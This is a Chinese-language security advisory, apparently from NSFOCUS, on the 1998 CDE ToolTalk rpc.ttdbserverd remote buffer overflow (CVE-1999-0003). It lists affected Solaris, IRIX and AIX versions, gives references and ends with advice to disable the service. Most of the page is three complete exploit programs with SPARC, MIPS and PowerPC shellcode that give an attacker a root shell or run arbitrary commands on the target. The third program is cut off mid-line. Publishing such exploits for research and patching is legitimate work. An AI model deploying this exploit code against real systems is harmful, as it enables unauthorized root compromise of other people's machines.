首页 -> 安全研究
安全研究
安全漏洞
多家厂商CDE ToolTalk数据库服务器rpc.ttdbserverd远程缓冲区溢出漏洞
发布日期:1998-08-31
更新日期:2002-05-20
受影响系统:
Multiple Vendor rpc.ttdbserverd不受影响系统:
- HP HP-UX 11.0
- HP HP-UX 10.30
- HP HP-UX 10.20
- HP HP-UX 10.10
- IBM AIX 4.3
- IBM AIX 4.2.1
- IBM AIX 4.2
- IBM AIX 4.1.5
- IBM AIX 4.1.4
- IBM AIX 4.1.3
- IBM AIX 4.1.2
- IBM AIX 4.1.1
- IBM AIX 4.1
- SGI IRIX 6.4
- SGI IRIX 6.3
- SGI IRIX 6.2
- SGI IRIX 6.1
- SGI IRIX 6.0.1XFS
- SGI IRIX 6.0.1
- SGI IRIX 6.0
- SGI IRIX 5.3XFS
- SGI IRIX 5.3
- SGI IRIX 5.2
- Sun Solaris 2.6
- Sun Solaris 2.5.1 x86
- Sun Solaris 2.5.1
- Sun Solaris 2.5
- Sun Solaris 2.4 x86
- Sun Solaris 2.4
- Sun Solaris 2.3
- Sun Solaris 2.2
- Sun Solaris 2.1
- Sun Solaris 2.0
- Sun Solaris 1.2
- Sun Solaris 1.1.4
- Sun Solaris 1.1.3
- Sun Solaris 1.1.2
- Sun Solaris 1.1.1
- Sun Solaris 1.1
Multiple Vendor rpc.ttdbserverd描述:
- SGI IRIX 6.5.9m
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.9f
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.9
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.8m
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.8f
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.8
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.7m
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.7f
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.7
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.6m
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.6f
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.6
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.5m
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.5f
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.5
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.4m
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.4f
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.4
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.3m
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.3f
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.3
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.14m
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.14f
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.14
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.13m
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.13f
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.13
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.12m
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.12f
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.12
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.11m
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.11f
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.11
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.10m
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.10f
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.10
BUGTRAQ ID: 122
CVE(CAN) ID: CVE-1999-0003
Common Desktop Environment (CDE)是一款集成图形用户接口,运行在各种UNIX和LINUX操作系统下,CDE ToolTalk服务允许独立的开发应用程序,使应用程序可以跨主机和平台交换ToolTalk信息相互之间通信,使用ToolTalk服务,应用程序可以建立开放协议允许各种程序进行交换和新的程序插入到系统中可以尽可能最小化重新配置。ToolTalk RPC数据库服务程序,rpc.ttdbserverd用于管理ToolTalk应用通信。很多Unix系统厂商默认都安装了CDE。
ToolTalk数据库服务的一个执行错误可以使远程攻击者在支持ToolTalk服务的主机上以超级用户的权限运行任意指令。
在ToolTalk数据库服务发生执行错误的时候,远程客户端发送一个恶意的RPC消息可能引起一个堆变量的溢出,执行恶意RPC消息里的任意指令,从而获得主机的root用户权限。
<*链接:http://online.securityfocus.com/advisories/281
http://marc.theaimsgroup.com/?l=bugtraq&m=90461590528287&w=2
http://www.cert.org/advisories/CA-1998-11.html
ftp://patches.sgi.com/support/free/security/advisories/19981101-01-P
ftp://patches.sgi.com/support/free/security/advisories/20020302-01-A
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*## copyright LAST STAGE OF DELIRIUM jul 1998 poland *://lsd-pl.net/ #*/
/*## rpc.ttdbserverd #*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <stdio.h>
#include <errno.h>
int adrnum;
int nopnum;
#define TTDBSERVERD_PROG 100083
#define TTDBSERVERD_VERS 1
#define TTDBSERVERD_ISERASE 7
char findsckcode[]=
"\x20\xbf\xff\xff" /* bn,a <findsckcode-4> */
"\x20\xbf\xff\xff" /* bn,a <findsckcode> */
"\x7f\xff\xff\xff" /* call <findsckcode+4> */
"\xa0\x20\x3f\xff" /* sub %g0,-1,%l0 */
"\xa4\x03\xff\xd0" /* add %o7,-48,%l2 */
"\xa6\x10\x20\x44" /* mov 0x44,%l3 */
"\xa8\x10\x23\xff" /* mov 0x3ff,%l4 */
"\xaa\x03\xe0\x44" /* add %o7,68,%l5 */
"\x81\xc5\x60\x08" /* jmp %l5+8 */
"\xaa\x10\x20\xff" /* mov 0xff,%l5 */
"\xab\x2d\x60\x08" /* sll %l5,8,%l5 */
"\xaa\x15\x60\xff" /* or %l5,0xff,%l5 */
"\xe2\x03\xff\xd0" /* ld [%o7-48],%l1 */
"\xac\x0c\x40\x15" /* and %l1,%l5,%l6 */
"\x2b\x00\x00\x00" /* sethi %hi(0x00000000),%l5 */
"\xaa\x15\x60\x00" /* or %l5,0x000,%l5 */
"\xac\x05\x40\x16" /* add %l5,%l6,%l6 */
"\xac\x05\xbf\xff" /* add %l6,-1,%l6 */
"\x80\xa5\xbf\xff" /* cmp %l6,-1 */
"\x02\xbf\xff\xf5" /* be <findsckcode+32> */
"\xaa\x03\xe0\x7c" /* add %o7,0x7c,%l5 */
"\xe6\x23\xff\xc4" /* st %l3,[%o7-60] */
"\xc0\x23\xff\xc8" /* st %g0,[%o7-56] */
"\xe4\x23\xff\xcc" /* st %l2,[%o7-52] */
"\x90\x04\x3f\xff" /* add %l0,-1,%o0 */
"\xaa\x10\x20\x54" /* mov 0x54,%l5 */
"\xad\x2d\x60\x08" /* sll %l5,8,%l6 */
"\x92\x15\xa0\x91" /* or %l6,0x91,%o1 */
"\x94\x03\xff\xc4" /* add %o7,-60,%o2 */
"\x82\x10\x20\x36" /* mov 0x36,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\xa0\x24\x3f\xff" /* sub %l0,-1,%l0 */
"\x1a\xbf\xff\xe9" /* bcc <findsckcode+36> */
"\x80\xa4\x23\xff" /* cmp %l0,0x3ff */
"\x04\xbf\xff\xf3" /* bl <findsckcode+84> */
"\xaa\x20\x3f\xff" /* sub %g0,-1,%l5 */
"\x90\x05\x7f\xff" /* add %l5,-1,%o0 */
"\x82\x10\x20\x06" /* mov 0x6,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\x90\x04\x3f\xfe" /* add %l0,-2,%o0 */
"\x82\x10\x20\x29" /* mov 0x29,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\xaa\x25\x7f\xff" /* sub %l5,-1,%l5 */
"\x80\xa5\x60\x03" /* cmp %l5,3 */
"\x04\xbf\xff\xf8" /* ble <findsckcode+144> */
"\x80\x1c\x40\x11" /* xor %l1,%l1,%g0 */
;
char shellcode[]=
"\x20\xbf\xff\xff" /* bn,a <shellcode-4> */
"\x20\xbf\xff\xff" /* bn,a <shellcode> */
"\x7f\xff\xff\xff" /* call <shellcode+4> */
"\x90\x03\xe0\x20" /* add %o7,32,%o0 */
"\x92\x02\x20\x10" /* add %o0,16,%o1 */
"\xc0\x22\x20\x08" /* st %g0,[%o0+8] */
"\xd0\x22\x20\x10" /* st %o0,[%o0+16] */
"\xc0\x22\x20\x14" /* st %g0,[%o0+20] */
"\x82\x10\x20\x0b" /* mov 0xb,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh"
;
char cmdshellcode[]=
"\x20\xbf\xff\xff" /* bn,a <cmdshellcode-4> */
"\x20\xbf\xff\xff" /* bn,a <cmdshellcode> */
"\x7f\xff\xff\xff" /* call <cmdshellcode+4> */
"\x90\x03\xe0\x34" /* add %o7,52,%o0 */
"\x92\x23\xe0\x20" /* sub %o7,32,%o1 */
"\xa2\x02\x20\x0c" /* add %o0,12,%l1 */
"\xa4\x02\x20\x10" /* add %o0,16,%l2 */
"\xc0\x2a\x20\x08" /* stb %g0,[%o0+8] */
"\xc0\x2a\x20\x0e" /* stb %g0,[%o0+14] */
"\xd0\x23\xff\xe0" /* st %o0,[%o7-32] */
"\xe2\x23\xff\xe4" /* st %l1,[%o7-28] */
"\xe4\x23\xff\xe8" /* st %l2,[%o7-24] */
"\xc0\x23\xff\xec" /* st %g0,[%o7-20] */
"\x82\x10\x20\x0b" /* mov 0xb,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh -c "
;
static char nop[]="\x80\x1c\x40\x11";
typedef struct{char *string;}req_t;
bool_t xdr_req(XDR *xdrs,req_t *obj){
if(!xdr_string(xdrs,&obj->string,~0)) return(FALSE);
return(TRUE);
}
main(int argc,char **argv){
char buffer[30000],address[4],*b,*cmd;
int i,c,n,flag=1,vers=0,port=0,sck;
CLIENT *cl;enum clnt_stat stat;
struct hostent *hp;
struct sockaddr_in adr;
struct timeval tm={10,0};
req_t req;
printf("copyright LAST STAGE OF DELIRIUM jul 1998 poland //lsd-pl.net/\n");
printf("rpc.ttdbserverd for solaris 2.3 2.4 2.5 2.5.1 2.6 sparc\n\n");
if(argc<2){
printf("usage: %s address [-s|-c command] [-p port] [-v 6]\n",argv[0]);
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"sc:p:v:"))!=-1){
switch(c){
case 's': flag=1;break;
case 'c': flag=0;cmd=optarg;break;
case 'p': port=atoi(optarg);break;
case 'v': vers=atoi(optarg);
}
}
if(vers==6){
*(unsigned long*)address=htonl(0xeffff420+1200+552);
adrnum=1200;
nopnum=1300;
}else{
*(unsigned long*)address=htonl(0xefffdadc+1000+4500);
adrnum=3000;
nopnum=6000;
}
printf("adr=0x%08x timeout=%d ",ntohl(*(unsigned long*)address),tm.tv_sec);
fflush(stdout);
adr.sin_family=AF_INET;
adr.sin_port=htons(port);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if((hp=gethostbyname(argv[1]))==NULL){
errno=EADDRNOTAVAIL;perror("error");exit(-1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
sck=RPC_ANYSOCK;
if(!(cl=clnttcp_create(&adr,TTDBSERVERD_PROG,TTDBSERVERD_VERS,&sck,0,0))){
clnt_pcreateerror("error");exit(-1);
}
cl->cl_auth=authunix_create("localhost",0,0,0,NULL);
b=buffer;
for(i=0;i<adrnum;i++) *b++=address[i%4];
for(i=0;i<nopnum;i++) *b++=nop[i%4];
if(flag){
i=sizeof(struct sockaddr_in);
if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
struct{unsigned int maxlen;unsigned int len;char *buf;}nb;
ioctl(sck,(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck,(('T'<<8)|144),&nb);
}
n=-ntohs(adr.sin_port);
printf("port=%d connected! ",-n);fflush(stdout);
*((unsigned long*)(&findsckcode[56]))|=htonl((n>>10)&0x3fffff);
*((unsigned long*)(&findsckcode[60]))|=htonl(n&0x3ff);
for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
}else{
for(i=0;i<strlen(cmdshellcode);i++) *b++=cmdshellcode[i];
for(i=0;i<strlen(cmd);i++) *b++=cmd[i];
*b++=';';
}
*b++=':';
*b=0;
req.string=buffer;
stat=clnt_call(cl,TTDBSERVERD_ISERASE,xdr_req,&req,xdr_void,NULL,tm);
if(stat==RPC_SUCCESS) {printf("\nerror: not vulnerable\n");exit(-1);}
printf("sent!\n");if(!flag) exit(0);
write(sck,"/bin/uname -a\n",14);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&fds)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
}
LSD(contact@lsd-pl.net) 提供了如下测试程序:
/*## copyright LAST STAGE OF DELIRIUM jul 1998 poland *://lsd-pl.net/ #*/
/*## rpc.ttdbserverd #*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <stdio.h>
#include <errno.h>
#define ADRNUM 2000
#define NOPNUM 18000
#define TTDBSERVERD_PROG 100083
#define TTDBSERVERD_VERS 1
#define TTDBSERVERD_ISERASE 7
char findsckcode[]=
"\x04\x10\xff\xff" /* bltzal $zero,<findsckcode> */
"\x24\x10\x01\x90" /* li $s0,400 */
"\x22\x11\xff\xb0" /* addi $s1,$s0,-80 */
"\x22\x12\xff\xac" /* addi $s2,$s0,-84 */
"\x22\x0d\xfe\x98" /* addi $t5,$s0,-360 */
"\x03\xed\x68\x20" /* add $t5,$ra,$t5 */
"\x01\xa0\xf0\x09" /* jalr $s8,$t5 */
"\x8f\xeb\xff\xc0" /* lw $t3,-64($ra) */
"\x31\x6b\xff\xff" /* andi $t3,$t3,0xffff */
"\x21\x6b\x00\x00" /* addi $t3,$t3,0 */
"\x22\x0d\xfe\xc0" /* addi $t5,$s0,-320 */
"\x11\x60\xff\xf9" /* beqz $t3,<findsckcode+20> */
"\x22\x24\xfe\xd4" /* addi $a0,$s1,-300 */
"\x23\xe5\xff\xc0" /* addi $a1,$ra,-64 */
"\x23\xe6\xff\xbc" /* addi $a2,$ra,-68 */
"\xaf\xf2\xff\xbc" /* sw $s2,-68($ra) */
"\x24\x02\x04\x45" /* li $v0,1093 */
"\x03\xff\xff\xcc" /* syscall */
"\x22\x31\xff\xff" /* addi $s1,$s1,-1 */
"\x10\xe0\xff\xf3" /* beqz $a3,<findsckcode+28> */
"\x22\x2b\xfe\xd4" /* addi $t3,$s1,-300 */
"\x1d\x60\xff\xf6" /* bgzt $t3,<findsckcode+48> */
"\x22\x04\xfe\x72" /* addi $a0,$s0,-398 */
"\x24\x02\x03\xee" /* li $v0,1006 */
"\x03\xff\xff\xcc" /* syscall */
"\x22\x24\xfe\xd5" /* addi $a0,$s1,-299 */
"\x22\x05\xfe\x72" /* addi $a1,$s0,-398 */
"\x24\x02\x04\x11" /* li $v0,1041 */
"\x03\xff\xff\xcc" /* syscall */
"\x22\x10\xff\xff" /* addi $s0,$s0,-1 */
"\x22\x0b\xfe\x72" /* addi $t3,$s0,-398 */
"\x05\x61\xff\xf6" /* bgez $t3,<findsckcode+88> */
;
char shellcode[]=
"\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */
"\x24\x02\x03\xf3" /* li $v0,1011 */
"\x23\xff\x01\x14" /* addi $ra,$ra,276 */
"\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */
"\x23\xe5\xff\x10" /* addi $a1,$ra,-220 */
"\xaf\xe4\xff\x10" /* sw $a0,-220($ra) */
"\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */
"\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */
"\x03\xff\xff\xcc" /* syscall */
"/bin/sh"
;
char cmdshellcode[]=
"\x04\x10\xff\xff" /* bltzal $zero,<cmdshellcode> */
"\x24\x02\x03\xf3" /* li $v0,1011 */
"\x23\xff\x08\xf4" /* addi $ra,$ra,2292 */
"\x23\xe4\xf7\x40" /* addi $a0,$ra,-2240 */
"\x23\xe5\xfb\x24" /* addi $a1,$ra,-1244 */
"\xaf\xe4\xfb\x24" /* sw $a0,-1244($ra) */
"\x23\xe6\xf7\x48" /* addi $a2,$ra,-2232 */
"\xaf\xe6\xfb\x28" /* sw $a2,-1240($ra) */
"\x23\xe6\xf7\x4c" /* addi $a2,$ra,-2228 */
"\xaf\xe6\xfb\x2c" /* sw $a2,-1236($ra) */
"\xaf\xe0\xfb\x30" /* sw $zero,-1232($ra) */
"\xa3\xe0\xf7\x47" /* sb $zero,-2233($ra) */
"\xa3\xe0\xf7\x4a" /* sb $zero,-2230($ra) */
"\x02\x04\x8d\x0c" /* syscall */
"\x01\x08\x40\x25" /* or $t0,$t0,$t0 */
"/bin/sh -c "
;
static char nop[]="\x24\x0f\x12\x34";
typedef struct{char *string;}req_t;
bool_t xdr_req(XDR *xdrs,req_t *obj){
if(!xdr_string(xdrs,&obj->string,~0)) return(FALSE);
return(TRUE);
}
main(int argc,char **argv){
char buffer[30000],address[4],*b,*cmd;
int i,c,n,flag=1,vers=6,port=0,sck;
CLIENT *cl;enum clnt_stat stat;
struct hostent *hp;
struct sockaddr_in adr;
struct timeval tm={10,0};
req_t req;
printf("copyright LAST STAGE OF DELIRIUM jul 1998 poland //lsd-pl.net/\n");
printf("rpc.ttdbserverd for irix 5.2 5.3 6.2 6.3 6.4 6.5 6.5.2 ");
printf("IP:17,19-22,25-28,30,32\n\n");
if(argc<2){
printf("usage: %s address [-s|-c command] [-p port] [-v 5]\n",argv[0]);
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"sc:p:v:"))!=-1){
switch(c){
case 's': flag=1;break;
case 'c': flag=0;cmd=optarg;break;
case 'p': port=atoi(optarg);break;
case 'v': vers=atoi(optarg);
}
}
if(vers==5) *(unsigned long*)address=htonl(0x7fff24f4+2000+9000+32700);
else *(unsigned long*)address=htonl(0x7fff24f4+2000+9000);
printf("adr=0x%08x timeout=%d ",ntohl(*(unsigned long*)address),tm.tv_sec);
fflush(stdout);
adr.sin_family=AF_INET;
adr.sin_port=htons(port);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if((hp=gethostbyname(argv[1]))==NULL){
errno=EADDRNOTAVAIL;perror("error");exit(-1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
sck=RPC_ANYSOCK;
if(!(cl=clnttcp_create(&adr,TTDBSERVERD_PROG,TTDBSERVERD_VERS,&sck,0,0))){
clnt_pcreateerror("error");exit(-1);
}
b=buffer;
for(i=0;i<ADRNUM;i++) *b++=address[i%4];
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
if(flag){
i=sizeof(struct sockaddr_in);
if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
struct netbuf {unsigned int maxlen;unsigned int len;char *buf;};
struct netbuf nb;
ioctl(sck,(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck,(('T'<<8)|144),&nb);
}
n=-ntohs(adr.sin_port);
printf("port=%d connected! ",-n);fflush(stdout);
findsckcode[36+2]=(unsigned char)((n&0xff00)>>8);
findsckcode[36+3]=(unsigned char)(n&0xff);
for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
for(i=0;i<4;i++) *b++=nop[i%4];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
}else{
printf("connected! ");fflush(stdout);
for(i=0;i<strlen(cmdshellcode);i++) *b++=cmdshellcode[i];
for(i=0;i<4;i++) *b++=' ';
for(i=0;i<strlen(cmd);i++) *b++=cmd[i];
}
*b++=':';
*b=0;
req.string=buffer;
cl->cl_auth=authunix_create("localhost",0,0,0,NULL);
stat=clnt_call(cl,TTDBSERVERD_ISERASE,xdr_req,&req,xdr_void,NULL,tm);
printf("sent!\n");
if(!flag) exit(0);
write(sck,"/bin/uname -a\n",14);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&fds)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
}
LSD(contact@lsd-pl.net) 提供了如下测试程序:
/*## copyright LAST STAGE OF DELIRIUM jul 1998 poland *://lsd-pl.net/ #*/
/*## rpc.ttdbserver #*/
/* note: to avoid potential system hang-up please, first obtain the exact */
/* AIX OS level with the use of some OS fingerprinting method */
/* due to the "end of page copy" and cache problems we got very little */
/* space for the nops buffer. this is why an additional offset might be */
/* required to be specified in order to exploit this vulnerability. */
/* for offsets use the [+-]n*600 values: 0,-600,600,-1200,1200,-1800,.. */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <stdio.h>
#include <errno.h>
#define ADRNUM 3000
#define NOPNUM 740
#define TTDBSERVERD_PROG 100083
#define TTDBSERVERD_VERS 1
#define TTDBSERVERD_ISERASE 7
#define SCAIX41 "\x03\x68\x41\x5e\x6d\x7f\x6f\xd6\x57\x56\x55\x53"
#define SCAIX42 "\x02\x71\x46\x62\x76\x8e\x78\xe7\x5b\x5a\x59\x58"
char syscallcode[]=
"\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */
"\x40\x82\xff\xfd" /* bnel <syscallcode> */
"\x7e\xa8\x02\xa6" /* mflr r21 */
"\x3a\xc0\x01\xff" /* lil r22,0x1ff */
"\x3a\xf6\xfe\x2d" /* cal r23,-467(r22) */
"\x7e\xb5\xba\x14" /* cax r21,r21,r23 */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x20" /* bctr */
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca 0x0 */
"\x3a\xb5\xff\xf8" /* cal r21,-8(r21) */
;
char findsckcode[]=
"\x2c\x74\x12\x34" /* cmpi cr0,r20,0x1234 */
"\x41\x82\xff\xfd" /* beql <findsckcode> */
"\x7f\x08\x02\xa6" /* mflr r24 */
"\x3b\x36\xfe\x2d" /* cal r25,-467(r22) */
"\x3b\x40\x01\x01" /* lil r26,0x16 */
"\x7f\x78\xca\x14" /* cax r27,r24,r25 */
"\x7f\x69\x03\xa6" /* mtctr r27 */
"\x4e\x80\x04\x20" /* bctr */
"\xa3\x78\xff\xfe" /* lhz r27,-2(r24) */
"\xa3\x98\xff\xfa" /* lhz r28,-6(r24) */
"\x7c\x1b\xe0\x40" /* cmpl cr0,r27,r28 */
"\x3b\x36\xfe\x59" /* cal r25,-423(r22) */
"\x41\x82\xff\xe4" /* beq <findsckcode+20> */
"\x7f\x43\xd3\x78" /* mr r3,r26 */
"\x38\x98\xff\xfc" /* cal r4,-4(r24) */
"\x38\xb8\xff\xf4" /* cal r5,-12(r24) */
"\x93\x38\xff\xf4" /* st r25,-12(r24) */
"\x88\x55\xff\xf6" /* lbz r2,-10(r21) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x21" /* bctrl */
"\x37\x5a\xff\xff" /* ai. r26,r26,-1 */
"\x2d\x03\xff\xff" /* cmpi cr2,r3,-1 */
"\x40\x8a\xff\xc8" /* bne cr2,<findsckcode+32> */
"\x40\x82\xff\xd8" /* bne <findsckcode+48> */
"\x3b\x36\xfe\x03" /* cal r25,-509(r22) */
"\x3b\x76\xfe\x02" /* cal r27,-510(r22) */
"\x7f\x23\xcb\x78" /* mr r3,r25 */
"\x88\x55\xff\xf7" /* lbz r2,-9(r21) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x21" /* bctrl */
"\x7c\x7a\xda\x14" /* cax r3,r26,r27 */
"\x7e\x84\xa3\x78" /* mr r4,r20 */
"\x7f\x25\xcb\x78" /* mr r5,r25 */
"\x88\x55\xff\xfb" /* lbz r2,-5(r21) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x21" /* bctrl */
"\x37\x39\xff\xff" /* ai. r25,r25,-1 */
"\x40\x80\xff\xd4" /* bge <findsckcode+100> */
;
char shellcode[]=
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x55\xff\xf4" /* lbz r2,-12(r21) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x20" /* bctr */
"/bin/sh"
;
char nop[]="\x3a\xc0\x01\x90";
typedef struct{char *string;}req_t;
bool_t xdr_req(XDR *xdrs,req_t *obj){
if(!xdr_string(xdrs,&obj->string,~0)) return(FALSE);
return(TRUE);
}
main(int argc,char **argv){
char buffer[30000],address[4],*b;
int i,c,n,vers=-1,port=0,ofs=0,sck;
CLIENT *cl;enum clnt_stat stat;
struct hostent *hp;
struct sockaddr_in adr;
struct timeval tm={10,0};
req_t req;
printf("copyright LAST STAGE OF DELIRIUM jul 1998 poland //lsd-pl.net/\n");
printf("rpc.ttdbserver for aix 4.1 4.2\n\n");
if(argc<2){
printf("usage: %s address [-p port] [-o ofs] -v [41|42]\n",argv[0]);
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"p:v:o:"))!=-1){
switch(c){
case 'p': port=atoi(optarg); break;
case 'v': vers=atoi(optarg); break;
case 'o': ofs=atoi(optarg);
}
}
if(vers==-1) exit(-1);
if(vers==41){
*(unsigned long*)address=0x2002fa0c+300+ofs;
memcpy(&syscallcode[32],SCAIX41,12);
}
if(vers==42){
memcpy(&syscallcode[32],SCAIX42,12);
*(unsigned long*)address=0x2002f250+300+ofs;
}
printf("adr=0x%08x timeout=%d ",ntohl(*(unsigned long*)address),tm.tv_sec);
fflush(stdout);
adr.sin_family=AF_INET;
adr.sin_port=htons(port);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if((hp=gethostbyname(argv[1]))==NULL){
errno=EADDRNOTAVAIL;perror("error");exit(-1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
sck=RPC_ANYSOCK;
if(!(cl=clnttcp_create(&adr,TTDBSERVERD_PROG,TTDBSERVERD_VERS,&sck,0,0))){
clnt_pcreateerror("error");exit(-1);
}
i=sizeof(struct sockaddr_in);
if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
struct netbuf {unsigned int maxlen;unsigned int len;char *buf;}nb;
ioctl(sck,(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck,(('T'<<8)|144),&nb);
}
n=ntohs(adr.sin_port);
printf("port=%d connected! ",n);fflush(stdout);
findsckcode[0+2]=(unsigned char)((n&0xff00)>>8);
findsckcode[0+3]=(unsigned char)(n&0xff);
b=buffer;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(syscallcode);i++) *b++=syscallcode[i];
for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
*b++=' ';
*b=0;
req.string=buffer;
cl->cl_auth=authunix_create("localhost",0,0,0,NULL);
stat=clnt_call(cl,TTDBSERVERD_ISERASE,xdr_req,&req,xdr_void,NULL,tm);
printf("sent! ");fflush(stdout);
sleep(2);
b=buffer;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(syscallcode);i++) *b++=syscallcode[i];
for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
for(i=0;i<strlen(shellcode);i++) *b++=sh
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在没有安装补丁之前,建议您立刻关闭rpc.ttdbserverd程序。
以Solaris系统为例:
首先变成root身份,然后使用您熟悉的编辑器打开/etc/inetd.conf文件,找到如下行:
100083/1 tli rpc/tcp wait root /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverd
